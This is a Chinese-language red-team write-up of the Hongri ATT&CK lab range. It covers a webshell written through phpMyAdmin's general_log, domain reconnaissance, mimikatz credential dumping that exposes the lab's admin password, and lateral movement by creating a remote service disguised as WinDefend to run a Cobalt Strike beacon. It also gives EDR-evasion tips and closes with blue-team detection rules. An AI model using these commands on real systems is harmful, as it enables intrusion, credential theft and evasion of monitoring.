红队视角复盘：攻破红日靶场ATTCK实战一，我的内网横向移动策略与工具选型思考

红队工程师实战手记从外网突破到域控沦陷的战术决策全解析当外网暴露的phpMyAdmin成为唯一入口时大多数初级渗透测试者会本能地选择密码爆破或已知漏洞利用。但真正的红队作战往往需要更精细的战术选择——就像我们在这台双网卡Web服务器上发现日志写入功能未关闭时立即意识到这比常规的SQL注入更隐蔽有效。本文将还原一次完整的攻击链构建过程重点不是工具使用而是每个决策点背后的战术考量。1. 外网突破为何选择日志写入而非传统攻击路径面对phpMyAdmin这个看似普通的入口点成熟的攻击者会评估多种攻击方式的ROI投入产出比。我们最终放弃爆破和CVE利用转而采用日志写入攻击这背后有四个关键判断隐蔽性优先日志文件属于系统正常行为不会触发WAF的注入检测规则环境适配general_log状态显示为OFF但具备修改权限说明管理员缺乏安全意识路径可控通过phpinfo提前确认了网站绝对路径确保写入位置准确清理便利单行PHP代码比Webshell文件更容易事后清除痕迹实际操作中我们通过以下SQL链完成攻击闭环-- 侦察阶段 show variables like %general%; -- 武器化阶段 set global general_log on; set global general_log_fileC:/phpStudy/WWW/cmd.php; -- 载荷投递 SELECT ?php system($_GET[cmd]); ?;关键提示现代EDR系统会监控general_log_file参数的修改行为实战中建议先通过slow_query_log测试防御强度2. 内网侦察从信息碎片到拓扑重建的艺术获得Web服务器控制权后常规做法是立即进行横向移动。但我们花了45分钟执行深度侦察因为完整的内网图谱能降低后期攻击噪音。以下是域环境侦察的黄金命令组合侦察目标基础命令进阶技巧域架构验证net config workstationnltest /domain_trusts用户拓扑net user /domaindsquery user主机定位net group domain computersnslookup -typeSRV _ldap._tcp网络接口ipconfig /allroute print存活主机arp -afor /l %i in (1,1,255) do ping -n 1 192.168.52.%i通过交叉分析这些数据我们绘制出关键路径域控IP192.168.52.138 (owa.god.org)域内主机192.168.52.141 (ROOT-TVI862UBEH)当前主机192.168.52.143 (STU1) - 含双网卡3. 横向移动IPC$与服务创建的精准配合当发现域控与Web服务器存在信任关系时我们放弃了WMI和计划任务等常规方式选择IPC$服务组合拳这是基于以下矩阵分析攻击方式隐蔽性可靠性权限要求日志痕迹WMI★★★☆★★☆☆管理员4688事件计划任务★★☆☆★★★☆管理员4698事件DCOM★★☆☆★★☆☆域管理员安全日志IPC$服务★★★★★★★★本地管理员7045事件具体实施分为三个阶段阶段一凭证获取# 使用CS内置的mimikatz模块 mimikatz sekurlsa::logonpasswords获取到域管凭证god\administrator:hongrisec2020阶段二通道建立# 建立IPC$连接 net use \\192.168.52.138\ipc$ hongrisec2020 /user:god\administrator # 上传Beacon copy beacon.exe \\192.168.52.138\C$\Windows\Temp\阶段三持久化# 创建伪装服务 sc \\owa.god.org create WinDefend binpath cmd.exe /c C:\Windows\Temp\beacon.exe start auto # 触发执行 sc \\owa.god.org start WinDefend技术细节服务名称使用WinDefend这类系统服务名可绕过基础监控binpath中的cmd.exe /c能解决某些情况下的执行上下文问题4. 流量伪装SMB Beacon的对抗实践传统C2流量在内网往往会被迅速封堵我们采用SMB Beacon实现三个目标绕过出网限制利用445端口的内网通信白名单特性降低流量特征将C2通信封装在SMB协议的正常通信中实现中继跳板通过Web服务器中转控制域控流量CS监听器配置关键参数listener { name SMB_Internal payload windows/beacon_smb/bind_pipe pipe_name msagent_## smb_frame_header \\xFE\xSMB sleep 11 jitter 23 }在真实对抗中我们还添加了以下增强措施使用pipe_name模仿合法进程通信如\pipe\LSM_API_service设置非整数秒的sleep时间11秒而非10秒在非工作时间段降低通信频率sleep36005. 对抗检测从攻击者视角看防御盲区回顾整个攻击过程防御方在以下环节存在监控缺失日志监控层面未监控general_log_file参数的动态修改允许服务创建日志Event ID 7045中出现cmd.exe /c模式网络行为层面同一主机短时间内同时出现Web日志写入和SMB服务创建行为域控向Web服务器发起异常命名管道连接凭证保护层面域管账号未启用双因素认证相同凭证在多台服务器重复使用对于蓝队成员建议重点关注以下检测规则- rule: Suspicious Service Installation condition: event_id: 7045 and image_path: - *cmd.exe /c* - *powershell* - *bitsadmin* - rule: Abnormal SMB Connection condition: protocol: 445 and direction: inbound and (src_ip not in domain_controllers) and (dst_ip in domain_controllers)